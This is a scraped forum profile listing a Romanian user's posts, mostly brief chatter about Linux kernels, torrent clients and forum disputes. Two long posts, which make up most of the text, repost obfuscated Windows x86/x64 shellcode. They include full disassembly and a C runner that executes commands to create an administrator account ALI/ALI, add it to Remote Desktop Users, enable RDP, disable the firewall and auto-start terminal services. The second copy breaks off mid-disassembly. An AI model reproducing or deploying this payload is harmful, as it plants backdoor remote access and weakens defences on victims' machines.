Jump to content

Kalashnikov.

Active Members
  • Posts

    456
  • Joined

  • Last visited

Everything posted by Kalashnikov.

  1. Ei de ce nu ar fi cazuri speciale?
  2. Hai fii serios, e acceasi chestie cu SSH Terminal pus, in pula mia !
  3. linux kernel = open source windows kernel = ????? de asta sunt asa multe pe linux @Aerosol Ce mai ai de zis acum? pai si care din graficu ala arata exploiturile?
  4. Argumenteaza te rog, mai exact aici linux kernel sucks , multumesc.
  5. credeam ca zici de aia cu poza facuta de black cu pula in loc de nas @Rickets da, asta e cel despre care vorbeam, fake.
  6. "hacking pentru bani" Pai si tinkode ce a facut ? vindea db-uri si programu ala cu care a dat jos backtrack. Mue Ii alegem strict, si tinkode vindea db-uri pe forumuri private. Nu e frumos sa minti pentru reclama. De fapt a fost fake, reckon e doar un lake.
  7. Eu pe cyanogenmod am avut acceasi problema, am facut update la soft si s-a rezolvat treaba. Incearca si tu asta
  8. Ba uneori forumu se mai inspira si din viata reala, daca vezi pe mai multe browsere e adevarat
  9. Cine cacat are 600 postari pe rst si nu majoriatea cu reply? (inafara de aerosol) . bafta la vanzari, tind sa cred ca scopul nu e de a da gratis p.S:
  10. qbittorent Free software released under the GNU GPL license. Intended for Linux users. e si pe windows
  11. #Author: Ali Razmjoo ? ?#Title: ?Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] Obfuscated Shellcode Windows x64 [1218 Bytes].c /* #Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] #length: 1218 bytes #Date: 13 January 2015 #Author: Ali Razmjoo #tested On: Windows 7 x64 ultimate WinExec => 0x769e2c91 ExitProcess => 0x769679f8 ==================================== Execute : net user ALI ALI /add net localgroup Administrators ALI /add NET LOCALGROUP "Remote Desktop Users" ALI /add reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f netsh firewall set opmode disable sc config termservice start= auto ==================================== Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com'] Thanks to my friends , Dariush Nasirpour and Ehsan Nezami C:\Users\Ali\Desktop>objdump -D shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor %eax,%eax 2: 50 push %eax 3: b8 41 41 41 64 mov $0x64414141,%eax 8: c1 e8 08 shr $0x8,%eax b: c1 e8 08 shr $0x8,%eax e: c1 e8 08 shr $0x8,%eax 11: 50 push %eax 12: b9 6d 76 53 52 mov $0x5253766d,%ecx 17: ba 4d 59 32 36 mov $0x3632594d,%edx 1c: 31 d1 xor %edx,%ecx 1e: 51 push %ecx 1f: b9 6e 72 61 71 mov $0x7161726e,%ecx 24: ba 4e 33 2d 38 mov $0x382d334e,%edx 29: 31 d1 xor %edx,%ecx 2b: 51 push %ecx 2c: b9 6c 75 78 78 mov $0x7878756c,%ecx 31: ba 4c 34 34 31 mov $0x3134344c,%edx 36: 31 d1 xor %edx,%ecx 38: 51 push %ecx 39: b9 46 47 57 46 mov $0x46574746,%ecx 3e: ba 33 34 32 34 mov $0x34323433,%edx 43: 31 d1 xor %edx,%ecx 45: 51 push %ecx 46: b9 56 50 47 64 mov $0x64475056,%ecx 4b: ba 38 35 33 44 mov $0x44333538,%edx 50: 31 d1 xor %edx,%ecx 52: 51 push %ecx 53: 89 e0 mov %esp,%eax 55: bb 41 41 41 01 mov $0x1414141,%ebx 5a: c1 eb 08 shr $0x8,%ebx 5d: c1 eb 08 shr $0x8,%ebx 60: c1 eb 08 shr $0x8,%ebx 63: 53 push %ebx 64: 50 push %eax 65: bb dc 7a a8 23 mov $0x23a87adc,%ebx 6a: ba 4d 56 36 55 mov $0x5536564d,%edx 6f: 31 d3 xor %edx,%ebx 71: ff d3 call *%ebx 73: 31 c0 xor %eax,%eax 75: 50 push %eax 76: 68 41 41 64 64 push $0x64644141 7b: 58 pop %eax 7c: c1 e8 08 shr $0x8,%eax 7f: c1 e8 08 shr $0x8,%eax 82: 50 push %eax 83: b9 01 41 60 32 mov $0x32604101,%ecx 88: ba 48 61 4f 53 mov $0x534f6148,%edx 8d: 31 d1 xor %edx,%ecx 8f: 51 push %ecx 90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx 95: ba 5b 67 4c 63 mov $0x634c675b,%edx 9a: 31 d1 xor %edx,%ecx 9c: 51 push %ecx 9d: b9 03 24 36 21 mov $0x21362403,%ecx a2: ba 62 50 59 53 mov $0x53595062,%edx a7: 31 d1 xor %edx,%ecx a9: 51 push %ecx aa: b9 34 41 15 18 mov $0x18154134,%ecx af: ba 5d 32 61 6a mov $0x6a61325d,%edx b4: 31 d1 xor %edx,%ecx b6: 51 push %ecx b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx bc: ba 68 68 72 4b mov $0x4b726868,%edx c1: 31 d1 xor %edx,%ecx c3: 51 push %ecx c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx c9: ba 5a 57 5b 52 mov $0x525b575a,%edx ce: 31 d1 xor %edx,%ecx d0: 51 push %ecx d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx d6: ba 70 4b 70 51 mov $0x51704b70,%edx db: 31 d1 xor %edx,%ecx dd: 51 push %ecx de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx e3: ba 51 45 51 2d mov $0x2d514551,%edx e8: 31 d1 xor %edx,%ecx ea: 51 push %ecx eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx f0: ba 4d 39 68 39 mov $0x3968394d,%edx f5: 31 d1 xor %edx,%ecx f7: 51 push %ecx f8: 89 e0 mov %esp,%eax fa: bb 41 41 41 01 mov $0x1414141,%ebx ff: c1 eb 08 shr $0x8,%ebx 102: c1 eb 08 shr $0x8,%ebx 105: c1 eb 08 shr $0x8,%ebx 108: 53 push %ebx 109: 50 push %eax 10a: bb dc 7a a8 23 mov $0x23a87adc,%ebx 10f: ba 4d 56 36 55 mov $0x5536564d,%edx 114: 31 d3 xor %edx,%ebx 116: ff d3 call *%ebx 118: 31 c0 xor %eax,%eax 11a: 50 push %eax 11b: 68 41 41 64 64 push $0x64644141 120: 58 pop %eax 121: c1 e8 08 shr $0x8,%eax 124: c1 e8 08 shr $0x8,%eax 127: 50 push %eax 128: b9 02 63 6b 35 mov $0x356b6302,%ecx 12d: ba 4b 43 44 54 mov $0x5444434b,%edx 132: 31 d1 xor %edx,%ecx 134: 51 push %ecx 135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx 13a: ba 43 75 2d 71 mov $0x712d7543,%edx 13f: 31 d1 xor %edx,%ecx 141: 51 push %ecx 142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx 147: ba 54 5a 49 69 mov $0x69495a54,%edx 14c: 31 d1 xor %edx,%ecx 14e: 51 push %ecx 14f: b9 25 34 12 67 mov $0x67123425,%ecx 154: ba 4a 44 32 32 mov $0x3232444a,%edx 159: 31 d1 xor %edx,%ecx 15b: 51 push %ecx 15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx 161: ba 6e 71 74 6d mov $0x6d74716e,%edx 166: 31 d1 xor %edx,%ecx 168: 51 push %ecx 169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx 16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx 173: 31 d1 xor %edx,%ecx 175: 51 push %ecx 176: b9 35 15 03 2a mov $0x2a031535,%ecx 17b: ba 67 70 6e 45 mov $0x456e7067,%edx 180: 31 d1 xor %edx,%ecx 182: 51 push %ecx 183: b9 3a 17 75 46 mov $0x4675173a,%ecx 188: ba 6f 47 55 64 mov $0x6455476f,%edx 18d: 31 d1 xor %edx,%ecx 18f: 51 push %ecx 190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx 195: ba 6a 72 59 51 mov $0x5159726a,%edx 19a: 31 d1 xor %edx,%ecx 19c: 51 push %ecx 19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx 1a2: ba 66 65 45 6b mov $0x6b456566,%edx 1a7: 31 d1 xor %edx,%ecx 1a9: 51 push %ecx 1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx 1af: ba 53 65 61 7a mov $0x7a616553,%edx 1b4: 31 d1 xor %edx,%ecx 1b6: 51 push %ecx 1b7: 89 e0 mov %esp,%eax 1b9: bb 41 41 41 01 mov $0x1414141,%ebx 1be: c1 eb 08 shr $0x8,%ebx 1c1: c1 eb 08 shr $0x8,%ebx 1c4: c1 eb 08 shr $0x8,%ebx 1c7: 53 push %ebx 1c8: 50 push %eax 1c9: bb dc 7a a8 23 mov $0x23a87adc,%ebx 1ce: ba 4d 56 36 55 mov $0x5536564d,%edx 1d3: 31 d3 xor %edx,%ebx 1d5: ff d3 call *%ebx 1d7: 31 c0 xor %eax,%eax 1d9: 50 push %eax 1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx 1df: ba 38 6c 53 38 mov $0x38536c38,%edx 1e4: 31 d1 xor %edx,%ecx 1e6: 51 push %ecx 1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx 1ec: ba 62 62 5d 34 mov $0x345d6262,%edx 1f1: 31 d1 xor %edx,%ecx 1f3: 51 push %ecx 1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx 1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx 1fe: 31 d1 xor %edx,%ecx 200: 51 push %ecx 201: b9 1d 30 15 28 mov $0x2815301d,%ecx 206: ba 58 77 4a 6c mov $0x6c4a7758,%edx 20b: 31 d1 xor %edx,%ecx 20d: 51 push %ecx 20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx 213: ba 53 5b 77 44 mov $0x44775b53,%edx 218: 31 d1 xor %edx,%ecx 21a: 51 push %ecx 21b: b9 42 25 2a 66 mov $0x662a2542,%ecx 220: ba 2d 4b 59 46 mov $0x46594b2d,%edx 225: 31 d1 xor %edx,%ecx 227: 51 push %ecx 228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx 22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx 232: 31 d1 xor %edx,%ecx 234: 51 push %ecx 235: b9 20 2b 26 26 mov $0x26262b20,%ecx 23a: ba 63 44 48 48 mov $0x48484463,%edx 23f: 31 d1 xor %edx,%ecx 241: 51 push %ecx 242: b9 08 2b 23 67 mov $0x67232b08,%ecx 247: ba 66 52 77 34 mov $0x34775266,%edx 24c: 31 d1 xor %edx,%ecx 24e: 51 push %ecx 24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx 254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx 259: 31 d1 xor %edx,%ecx 25b: 51 push %ecx 25c: b9 67 67 1d 37 mov $0x371d6767,%ecx 261: ba 45 47 32 41 mov $0x41324745,%edx 266: 31 d1 xor %edx,%ecx 268: 51 push %ecx 269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx 26e: ba 71 45 68 49 mov $0x49684571,%edx 273: 31 d1 xor %edx,%ecx 275: 51 push %ecx 276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx 27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx 280: 31 d1 xor %edx,%ecx 282: 51 push %ecx 283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx 288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx 28d: 31 d1 xor %edx,%ecx 28f: 51 push %ecx 290: b9 34 23 23 3b mov $0x3b232334,%ecx 295: ba 68 77 46 49 mov $0x49467768,%edx 29a: 31 d1 xor %edx,%ecx 29c: 51 push %ecx 29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx 2a2: ba 73 48 65 78 mov $0x78654873,%edx 2a7: 31 d1 xor %edx,%ecx 2a9: 51 push %ecx 2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx 2af: ba 48 6d 37 3d mov $0x3d376d48,%edx 2b4: 31 d1 xor %edx,%ecx 2b6: 51 push %ecx 2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx 2bc: ba 52 6e 43 46 mov $0x46436e52,%edx 2c1: 31 d1 xor %edx,%ecx 2c3: 51 push %ecx 2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx 2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx 2ce: 31 d1 xor %edx,%ecx 2d0: 51 push %ecx 2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx 2d6: ba 58 7a 44 44 mov $0x44447a58,%edx 2db: 31 d1 xor %edx,%ecx 2dd: 51 push %ecx 2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx 2e3: ba 49 62 78 52 mov $0x52786249,%edx 2e8: 31 d1 xor %edx,%ecx 2ea: 51 push %ecx 2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx 2f0: ba 61 31 67 75 mov $0x75673161,%edx 2f5: 31 d1 xor %edx,%ecx 2f7: 51 push %ecx 2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx 2fd: ba 62 64 68 73 mov $0x73686462,%edx 302: 31 d1 xor %edx,%ecx 304: 51 push %ecx 305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx 30a: ba 36 33 78 69 mov $0x69783336,%edx 30f: 31 d1 xor %edx,%ecx 311: 51 push %ecx 312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx 317: ba 31 52 4c 67 mov $0x674c5231,%edx 31c: 31 d1 xor %edx,%ecx 31e: 51 push %ecx 31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx 324: ba 58 49 79 72 mov $0x72794958,%edx 329: 31 d1 xor %edx,%ecx 32b: 51 push %ecx 32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx 331: ba 2d 65 52 6e mov $0x6e52652d,%edx 336: 31 d1 xor %edx,%ecx 338: 51 push %ecx 339: b9 16 10 1f 17 mov $0x171f1016,%ecx 33e: ba 34 58 54 52 mov $0x52545834,%edx 343: 31 d1 xor %edx,%ecx 345: 51 push %ecx 346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx 34b: ba 4e 43 68 4e mov $0x4e68434e,%edx 350: 31 d1 xor %edx,%ecx 352: 51 push %ecx 353: b9 39 22 5e 50 mov $0x505e2239,%ecx 358: ba 4b 47 39 70 mov $0x7039474b,%edx 35d: 31 d1 xor %edx,%ecx 35f: 51 push %ecx 360: 89 e0 mov %esp,%eax 362: bb 41 41 41 01 mov $0x1414141,%ebx 367: c1 eb 08 shr $0x8,%ebx 36a: c1 eb 08 shr $0x8,%ebx 36d: c1 eb 08 shr $0x8,%ebx 370: 53 push %ebx 371: 50 push %eax 372: bb dc 7a a8 23 mov $0x23a87adc,%ebx 377: ba 4d 56 36 55 mov $0x5536564d,%edx 37c: 31 d3 xor %edx,%ebx 37e: ff d3 call *%ebx 380: 31 c0 xor %eax,%eax 382: 50 push %eax 383: b8 41 41 41 65 mov $0x65414141,%eax 388: c1 e8 08 shr $0x8,%eax 38b: c1 e8 08 shr $0x8,%eax 38e: c1 e8 08 shr $0x8,%eax 391: 50 push %eax 392: b9 1e 53 39 3c mov $0x3c39531e,%ecx 397: ba 6d 32 5b 50 mov $0x505b326d,%edx 39c: 31 d1 xor %edx,%ecx 39e: 51 push %ecx 39f: b9 04 66 2f 32 mov $0x322f6604,%ecx 3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx 3a9: 31 d1 xor %edx,%ecx 3ab: 51 push %ecx 3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx 3b1: ba 69 73 62 75 mov $0x75627369,%edx 3b6: 31 d1 xor %edx,%ecx 3b8: 51 push %ecx 3b9: b9 20 41 47 36 mov $0x36474120,%ecx 3be: ba 45 35 67 59 mov $0x59673545,%edx 3c3: 31 d1 xor %edx,%ecx 3c5: 51 push %ecx 3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx 3cb: ba 47 69 44 59 mov $0x59446947,%edx 3d0: 31 d1 xor %edx,%ecx 3d2: 51 push %ecx 3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx 3d8: ba 62 5a 38 43 mov $0x43385a62,%edx 3dd: 31 d1 xor %edx,%ecx 3df: 51 push %ecx 3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx 3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx 3ea: 31 d1 xor %edx,%ecx 3ec: 51 push %ecx 3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx 3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx 3f7: 31 d1 xor %edx,%ecx 3f9: 51 push %ecx 3fa: 89 e0 mov %esp,%eax 3fc: bb 41 41 41 01 mov $0x1414141,%ebx 401: c1 eb 08 shr $0x8,%ebx 404: c1 eb 08 shr $0x8,%ebx 407: c1 eb 08 shr $0x8,%ebx 40a: 53 push %ebx 40b: 50 push %eax 40c: bb dc 7a a8 23 mov $0x23a87adc,%ebx 411: ba 4d 56 36 55 mov $0x5536564d,%edx 416: 31 d3 xor %edx,%ebx 418: ff d3 call *%ebx 41a: 31 c0 xor %eax,%eax 41c: 50 push %eax 41d: b8 41 41 41 6f mov $0x6f414141,%eax 422: c1 e8 08 shr $0x8,%eax 425: c1 e8 08 shr $0x8,%eax 428: c1 e8 08 shr $0x8,%eax 42b: 50 push %eax 42c: b9 72 2a 05 39 mov $0x39052a72,%ecx 431: ba 52 4b 70 4d mov $0x4d704b52,%edx 436: 31 d1 xor %edx,%ecx 438: 51 push %ecx 439: b9 54 3a 05 52 mov $0x52053a54,%ecx 43e: ba 35 48 71 6f mov $0x6f714835,%edx 443: 31 d1 xor %edx,%ecx 445: 51 push %ecx 446: b9 29 16 0a 47 mov $0x470a1629,%ecx 44b: ba 4c 36 79 33 mov $0x3379364c,%edx 450: 31 d1 xor %edx,%ecx 452: 51 push %ecx 453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx 458: ba 55 6d 32 5d mov $0x5d326d55,%edx 45d: 31 d1 xor %edx,%ecx 45f: 51 push %ecx 460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx 465: ba 41 77 48 75 mov $0x75487741,%edx 46a: 31 d1 xor %edx,%ecx 46c: 51 push %ecx 46d: b9 34 79 3a 12 mov $0x123a7934,%ecx 472: ba 53 59 4e 77 mov $0x774e5953,%edx 477: 31 d1 xor %edx,%ecx 479: 51 push %ecx 47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx 47f: ba 72 32 78 41 mov $0x41783272,%edx 484: 31 d1 xor %edx,%ecx 486: 51 push %ecx 487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx 48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx 491: 31 d1 xor %edx,%ecx 493: 51 push %ecx 494: 89 e0 mov %esp,%eax 496: bb 41 41 41 01 mov $0x1414141,%ebx 49b: c1 eb 08 shr $0x8,%ebx 49e: c1 eb 08 shr $0x8,%ebx 4a1: c1 eb 08 shr $0x8,%ebx 4a4: 53 push %ebx 4a5: 50 push %eax 4a6: bb dc 7a a8 23 mov $0x23a87adc,%ebx 4ab: ba 4d 56 36 55 mov $0x5536564d,%edx 4b0: 31 d3 xor %edx,%ebx 4b2: ff d3 call *%ebx 4b4: bb 9b 4f d0 30 mov $0x30d04f9b,%ebx 4b9: ba 63 36 46 46 mov $0x46463663,%edx 4be: 31 d3 xor %edx,%ebx 4c0: ff d3 call *%ebx */ #include <stdio.h> #include <string.h> int main(){ unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\xbb\x9b\x4f\xd0\x30\xba\x63\x36\x46\x46\x31\xd3\xff\xd3"; fprintf(stdout,"Length: %d\n\n",strlen(shellcode)); (*(void(*)()) shellcode)(); }
  12. #Author: Ali Razmjoo ??#Title: ?Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] Obfuscated Shellcode Windows x86 [1218 Bytes].c /*#Title: Obfuscated Shellcode Windows x86 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service] #length: 1218 bytes #Date: 13 January 2015 #Author: Ali Razmjoo #tested On: Windows 7 x86 ultimate WinExec => 0x7666e695 ExitProcess => 0x76632acf ==================================== Execute : net user ALI ALI /add net localgroup Administrators ALI /add NET LOCALGROUP "Remote Desktop Users" ALI /add reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f netsh firewall set opmode disable sc config termservice start= auto ==================================== Ali Razmjoo , ['Ali.Razmjoo1994@Gmail.Com','Ali@Z3r0D4y.Com'] Thanks to my friends , Dariush Nasirpour and Ehsan Nezami C:\Users\Ali\Desktop>objdump -D shellcode.o shellcode.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 31 c0 xor %eax,%eax 2: 50 push %eax 3: b8 41 41 41 64 mov $0x64414141,%eax 8: c1 e8 08 shr $0x8,%eax b: c1 e8 08 shr $0x8,%eax e: c1 e8 08 shr $0x8,%eax 11: 50 push %eax 12: b9 6d 76 53 52 mov $0x5253766d,%ecx 17: ba 4d 59 32 36 mov $0x3632594d,%edx 1c: 31 d1 xor %edx,%ecx 1e: 51 push %ecx 1f: b9 6e 72 61 71 mov $0x7161726e,%ecx 24: ba 4e 33 2d 38 mov $0x382d334e,%edx 29: 31 d1 xor %edx,%ecx 2b: 51 push %ecx 2c: b9 6c 75 78 78 mov 